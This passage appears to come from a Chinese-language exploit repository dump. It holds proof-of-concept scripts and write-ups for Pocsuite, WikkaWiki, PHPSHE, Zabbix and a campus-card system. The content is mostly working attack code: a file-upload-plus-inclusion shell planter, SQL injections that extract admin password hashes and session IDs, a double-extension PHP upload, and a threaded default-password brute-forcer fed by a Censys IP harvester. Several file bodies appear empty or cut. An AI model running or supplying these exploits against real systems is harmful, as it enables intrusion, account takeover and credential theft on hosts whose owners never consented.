name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" 48 | # 上传shell 49 | post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') 50 | resp = req.post(url=post_url,data=post_data) 51 | 52 | # 从返回的内容中提取上传图片的文件名 53 | if resp.status_code == 200: 54 | match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) 55 | if match_result: 56 | # 访问本地文件包含地址 57 | payload = "../../uploadfiles/" + match_result.group(1) + "%00" 58 | vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) 59 | resp = req.get(vul_url) 60 | if resp.status_code == 200 and '202cb962ac59075b964b07152d234b70' in resp.content: 61 | result['ShellInfo'] = {} 62 | result['ShellInfo']['URL'] = vul_url 63 | result['ShellInfo']['Content'] = "" 64 | return self.parse_attack(result) 65 | 66 | return self._verify() 67 | 68 | def _verify(self): 69 | if self.check_argv(): 70 | result = {} 71 | 72 | # 设置header里的Content-Type,表明需要上传文件 73 | self.headers['Content-Type'] = "multipart/form-data; boundary=----WebKitFormBoundaryMOKvckE0g6qr7jKz" 74 | # 文件名为testjpg.jpg,内容为 75 | post_data = "------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"files\"; filename=\"testjpg.jpg\"\r\nContent-Type: image/jpeg\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\n\r\n \r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"type\"\r\n\r\n\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picWidth\"\r\n\r\n142\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"picHeight\"\r\n\r\n102\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz\r\nContent-Disposition: form-data; name=\"waterImg\"\r\n\r\n0\r\n------WebKitFormBoundaryMOKvckE0g6qr7jKz--\r\n\r\n" 76 | # 上传地址,这个是正常功能 77 | post_url = urlparse.urljoin(self.url,'index.php?ac=common_upfile&type=') 78 | resp = req.post(url=post_url,data=post_data) 79 | 80 | # 从返回的内容中提取上传图片的文件名 81 | if resp.status_code == 200: 82 | match_result = re.search(r'value =\'(.*?)\'',resp.content,re.I | re.M) 83 | if match_result: 84 | # 访问本地文件包含地址 85 | payload = "../../uploadfiles/" + match_result.group(1) + "%00" 86 | vul_url = urlparse.urljoin(self.url,"index.php?d=" + payload) 87 | resp = req.get(vul_url) 88 | if resp.status_code == 200 and '5a8adb32edd60e0cfb459cfb38093755' in resp.content: 89 | result['VerifyInfo'] = {} 90 | result['VerifyInfo']['URL'] = vul_url 91 | return self.parse_attack(result) 92 | 93 | def parse_output(self, result): 94 | #parse output 95 | output = Output(self) 96 | if result: 97 | output.success(result) 98 | else: 99 | output.fail('Internet nothing returned') 100 | return output 101 | 102 | 103 | register(TestPOC) -------------------------------------------------------------------------------- /WikkaWiki 1.3.2 Spam Logging PHP Injection/README.md: -------------------------------------------------------------------------------- 1 | # WikkaWiki 1.3.2 Spam Logging PHP Injection 2 | --- 3 | 先来看下位于 /actions/files/files.php 的这段代码 4 | 5 | ``` 6 | 266. elseif (preg_match('/.+\.('.$allowed_extensions.')$/i', $_FILES['file']['name'])) 7 | 267. { 8 | 268. $strippedname = str_replace('\'', '', $_FILES['file']['name']); 9 | 269. $strippedname = rawurlencode($strippedname); 10 | 270. $strippedname = stripslashes($strippedname); 11 | 271. $destfile = $upload_path.DIRECTORY_SEPARATOR.$strippedname; 12 | 272. } 13 | 273. if (!file_exists($destfile)) 14 | 274. { 15 | 275. if (move_uploaded_file($_FILES['file']['tmp_name'], $destfile)) 16 | 276. { 17 | 277. $notification_msg = T_("File was successfully uploaded."); 18 | 278. } 19 | ... 20 | ``` 21 | 22 | 在"INTRANET_MODE"开启或者攻击者利用CVE-2011-4448漏洞成功实施会话劫持攻击,攻击者可以上传包含多个扩展名的文件。 23 | 24 | 代码第266行的$allowed_extensions定义如下: 25 | 26 | ``` 27 | gif|jpeg|jpg|jpe|png|doc|xls|csv|ppt|ppz|pps|pot|pdf|asc|txt|zip|gtar|g 28 | z|bz2|tar|rar|vpp|mpp|vsd|mm|htm|htm 29 | ``` 30 | 31 | 像mm、vpp等扩展名在Apache中的mime.types中是非常少见的。 32 | 33 | 在Apache 1.x、2.x中,apache对文件名的解析是从后往前解析的,直到遇到一个Apache认识的文件类型为止。 34 | 35 | 所以上传一个test.php.mm,对于Apache来说会从后一直历遍后缀到.php,然后认为是个php类型的文件。 36 | 37 | 现在来看攻击过程 38 | 39 | 假设test这个页面是包含了files.php的,构造以下请求 40 | 41 | ``` 42 | POST /wikka/test HTTP/1.1 43 | Host: localhost 44 | Cookie: 96522b217a86eca82f6d72ef88c4c7f4=upjhsdd5rtc0ib55gv36l0jdt3 45 | Content-Length: 251 46 | Content-Type: multipart/form-data; boundary=--------1503534127 47 | Connection: keep-alive 48 | 49 | ----------1503534127 50 | Content-Disposition: form-data; name="file"; filename="test.php.mm" 51 | Content-Type: application/octet-stream 52 | 53 | 54 | ----------1503534127 55 | Content-Disposition: form-data; name="upload" 56 | 57 | Upload 58 | ----------1503534127-- 59 | ``` -------------------------------------------------------------------------------- /WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities/README.md: -------------------------------------------------------------------------------- 1 | # WikkaWiki <= 1.3.2 - Multiple Security Vulnerabilities 2 | --- 3 | /actions/usersettings/usersettings.php代码中存在此漏洞 4 | 5 | ``` 6 | 141. $this->Query(" 7 | 142. UPDATE ".$this->GetConfigValue('table_prefix')."users 8 | 143. SET email = '".mysql_real_escape_string($email)."', 9 | 144. doubleclickedit = '".mysql_real_escape_string($doubleclickedit)."', 10 | 145. show_comments = '".mysql_real_escape_string($show_comments)."', 11 | 146. default_comment_display = '".$default_comment_display."', 12 | 147. revisioncount = ".$revisioncount.", 13 | 148. changescount = ".$changescount.", 14 | 149. theme = '".mysql_real_escape_string($usertheme)."' 15 | 150. WHERE name = '".$user['name']."' 16 | 151. LIMIT 1" 17 | 152. ); 18 | ``` 19 | 20 | 在进行update操作的时候,$default_comment_display是唯一一个没有用mysql_real_escape_string()处理过的参数 21 | 22 | 可以构造语句获取admin的会话记录用于会话劫持,构造以下请求 23 | 24 | ``` 25 | POST /wikka/UserSettings HTTP/1.1 26 | Host: localhost 27 | Cookie: 96522b217a86eca82f6d72ef88c4c7f4=c3u94bo2csludij3v18787i4p6 28 | Content-Length: 140 29 | Content-Type: application/x-www-form-urlencoded 30 | Connection: keep-alive 31 | 32 | action=update&email=test%40test.com&default_comment_display=',email=(SELECT sessionid FROM wikka_sessions WHERE userid='WikiAdmin'),theme=' 33 | ``` 34 | 35 | 如果admin已经登录或者会话仍未过期,就可获得admin的会话记录 -------------------------------------------------------------------------------- /Zabbix弱口令/Zabbix.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # -*- coding:utf-8 -*- 3 | 4 | # zabbix弱口令 5 | 6 | import requests 7 | import threading 8 | from Queue import Queue 9 | 10 | url_queue = Queue() 11 | vul_queue = Queue() 12 | THREAD_NUM = 20 13 | vul_url_txt = open("zabbix_vul_ip.txt","w") 14 | users = { 15 | "Admin":"zabbix", 16 | "test":"test" 17 | } 18 | 19 | class Zabbix: 20 | def __init__(self): 21 | self.headers = { 22 | "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.109 Safari/537.36", 23 | "Content-Type":"application/x-www-form-urlencoded" 24 | } 25 | 26 | def set_ip(self,ip): 27 | self.ip = ip 28 | 29 | def check(self): 30 | global users 31 | urls = ["http://" + self.ip + "/index.php","http://" + self.ip + "/zabbix/index.php"] 32 | for url in urls: 33 | for (username,password) in users.items(): 34 | data = "request=&name=" + username + "&password=" + password + "&autologin=1&enter=Sign+in" 35 | # print data 36 | try: 37 | response = requests.post(url = url,data = data,headers = self.headers,timeout = 10) 38 | if response.status_code == 200 and "Admin" in response.content: 39 | return True 40 | # pass 41 | # print "=====================" 42 | # print response.text.find("Admin") 43 | except Exception,e: 44 | # print e 45 | pass 46 | return False 47 | 48 | class testTarget(threading.Thread): 49 | def __init__(self): 50 | threading.Thread.__init__(self) 51 | 52 | def run(self): 53 | global url_queue 54 | global THREAD_NUM 55 | zabbix = Zabbix() 56 | while not url_queue.empty(): 57 | ip = url_queue.get() 58 | print "Checing " + ip 59 | zabbix.set_ip(ip) 60 | if zabbix.check(): 61 | vul_queue.put(ip) 62 | 63 | def test(): 64 | threads = [] 65 | for i in range(THREAD_NUM): 66 | t = testTarget() 67 | t.start() 68 | threads.append(t) 69 | for t in threads: 70 | t.join() 71 | 72 | if __name__ == '__main__': 73 | ip_text = open("zabbix_ip.txt","r") 74 | for line in ip_text: 75 | url_queue.put(line.strip("\n")) 76 | ip_text.close() 77 | test() 78 | while not vul_queue.empty(): 79 | vul_url_txt.write(vul_queue.get() + "\n") 80 | 81 | vul_url_txt.close() 82 | -------------------------------------------------------------------------------- /censys_query.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import json 3 | from Queue import Queue 4 | import threading 5 | import sys 6 | import time 7 | 8 | API_URL = "https://www.censys.io/api/v1" 9 | UID = "" 10 | SECRET = "" 11 | PAGES = 28 12 | cur_page = 1 13 | 14 | vul_ip = open("test_ip.txt","w") 15 | 16 | def get_ip(query,page): 17 | data = { 18 | "query":query, 19 | "page":page, 20 | "fields":["ip"] 21 | } 22 | 23 | try: 24 | res = requests.post(API_URL + "/search/ipv4",data=json.dumps(data),auth=(UID,SECRET)) 25 | results = res.json() 26 | if res.status_code != 200: 27 | print "Error : %s" % results["error"] 28 | sys.exit(1) 29 | else: 30 | result_iter = iter(results["results"]) 31 | for result in result_iter: 32 | vul_ip.write(result["ip"] + "\n") 33 | except Exception,e: 34 | print e 35 | 36 | 37 | if __name__ == "__main__": 38 | if len(sys.argv) != 2: 39 | print """ 40 | Usage: 41 | python censys_query.py query_str 42 | """ 43 | sys.exit() 44 | else: 45 | query = sys.argv[1] 46 | 47 | while cur_page <= PAGES: 48 | print "Page" + str(cur_page) 49 | get_ip(query,cur_page) 50 | cur_page += 1 51 | time.sleep(1) 52 | vul_ip.close() -------------------------------------------------------------------------------- /eYou老版本Cookie命令执行/README.md: -------------------------------------------------------------------------------- 1 | ##亿邮某些老版本通杀型漏洞 2 | --- 3 | 针对旧版本eYou的cookie任意命令执行,此POC不再维护 -------------------------------------------------------------------------------- /eYou老版本Cookie命令执行/eYouExp.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /phpoa4.0 任意文件上传/README.md: -------------------------------------------------------------------------------- 1 | ####PHPOA4.0通杀上传漏洞 2 | --- 3 | WooYun:http://www.wooyun.org/bugs/wooyun-2015-0163072 4 | 5 | 在提交漏洞的时候少测试了是否要登录这一步,提交确认后却发现原来不用登录直接上传一句话即可,页面返回的json里有地址 6 | 7 | 复习周中,找个时间再写脚本 8 | 9 |
10 | 11 | 12 |
-------------------------------------------------------------------------------- /phpshe1.4 sql injection/README.md: -------------------------------------------------------------------------------- 1 | ##PHPSHE 1.4 /www/module/user/order.php注入 2 | --- 3 | 暂无详情,请移步POC -------------------------------------------------------------------------------- /phpshe1.4 sql injection/poc.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # coding:utf-8 3 | 4 | from pocsuite.lib.core.poc import Output, POCBase 5 | from pocsuite.lib.core.register import registerPoc as register 6 | from pocsuite.lib.request.basic import req 7 | from pocsuite.lib.core.data import logger 8 | from pocsuite.lib.core.enums import CUSTOM_LOGGING 9 | import urlparse 10 | import re 11 | 12 | class TestPOC(POCBase): 13 | vulID = '' # ssvid 14 | version = '1.0' 15 | author = ['Gump'] 16 | vulDate = '' 17 | createDate = '2016-01-24' 18 | updateDate = '2016-01-24' 19 | references = ['http://www.wooyun.org/bugs/wooyun-2015-0141457'] 20 | name = 'PHPSHE 1.4 /www/module/user/order.php SQL注入 POC' 21 | appPowerLink = 'http://www.phpshe.com/' 22 | appName = 'PHPSHE' 23 | appVersion = '1.4' 24 | vulType = 'SQL injection' 25 | desc = ''' 26 | PHPSHE 1.4 在/www/module/user/order.php中对参数过滤不严导致SQL注入 27 | ''' 28 | 29 | def check_argv(self): 30 | logger.log(CUSTOM_LOGGING.WARNING,u"注意,需要登录后的cookie") 31 | if self.headers['Cookie']: 32 | logger.log(CUSTOM_LOGGING.WARNING,u"请确保cookie正确") 33 | return True 34 | else: 35 | logger.log(CUSTOM_LOGGING.WARNING,u"请提交登录后的cookie") 36 | return False 37 | 38 | def _attack(self): 39 | if self.check_argv(): 40 | result = {} 41 | payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(char(45,45,45),admin_name,char(45,45,45),admin_pw,char(45,45,45))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" 42 | vulurl = urlparse.urljoin(self.url,'user.php' + payload) 43 | resp = req.get(vulurl) 44 | if resp.status_code == 200: 45 | match_result = re.search(r'---(.+)---(.+)---',resp.content,re.I | re.M) 46 | if match_result: 47 | result['AdminInfo'] = {} 48 | result['AdminInfo']['Username'] = match_result.group(1) 49 | result['AdminInfo']['Password'] = match_result.group(2) 50 | return self.parse_attack(result) 51 | 52 | def _verify(self): 53 | if self.check_argv(): 54 | result = {} 55 | payload = "?mod=order&state=11111111%27%20UNION%20SELECT%20(select%20concat(floor(rand(0)*2),md5(1))%20from%20pe_admin%20limit%201),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28%23" 56 | vulurl = urlparse.urljoin(self.url,'user.php' + payload) 57 | resp = req.get(vulurl) 58 | if resp.status_code == 200 and 'c4ca4238a0b923820dcc509a6f75849b' in resp.content: 59 | result['VerifyInfo'] = {} 60 | result['VerifyInfo']['URL'] = urlparse.urljoin(self.url,'user.php') 61 | result['VerifyInfo']['Payload'] = payload 62 | return self.parse_attack(result) 63 | 64 | def parse_attack(self,result): 65 | output = Output(self) 66 | if result: 67 | output.success(result) 68 | else: 69 | output.fail('Nothon returned') 70 | return output 71 | 72 | register(TestPOC) 73 | -------------------------------------------------------------------------------- /新中新校园卡任意文件上传/README.md: -------------------------------------------------------------------------------- 1 | ##新中新电子卡系统通杀型漏洞 2 | --- 3 | 测试年代有点久远,学校校园卡查询系统服务器也已经关闭,不再维护该POC -------------------------------------------------------------------------------- /新中新校园卡任意文件上传/poc.php: -------------------------------------------------------------------------------- 1 | "@D:\\123.jsp" 8 | 9 | ); 10 | 11 | $ch=curl_init(); 12 | 13 | curl_setopt($ch, CURLOPT_URL, $url); 14 | 15 | curl_setopt($ch, CURLOPT_HEADER, false); 16 | 17 | curl_setopt($ch,CURLOPT_BINARYTRANSFER,true); 18 | 19 | curl_setopt($ch, CURLOPT_POST, 1); 20 | 21 | @curl_setopt($ch, CURLOPT_POSTFIELDS, $file); 22 | 23 | curl_setopt($ch, CURLOPT_HEADER, 1); 24 | 25 | curl_setopt($ch, CURLOPT_NOBODY, 0); 26 | 27 | curl_setopt($ch,CURLOPT_RETURNTRANSFER,1); 28 | 29 | curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); 30 | 31 | $content=curl_exec($ch); 32 | 33 | $rinfo=curl_getinfo($ch); 34 | 35 | @$content=iconv("GB2312","UTF-8",htmlentities($content,ENT_COMPAT,'GB2312')); 36 | 37 | echo $content."


"; 38 | ?> --------------------------------------------------------------------------------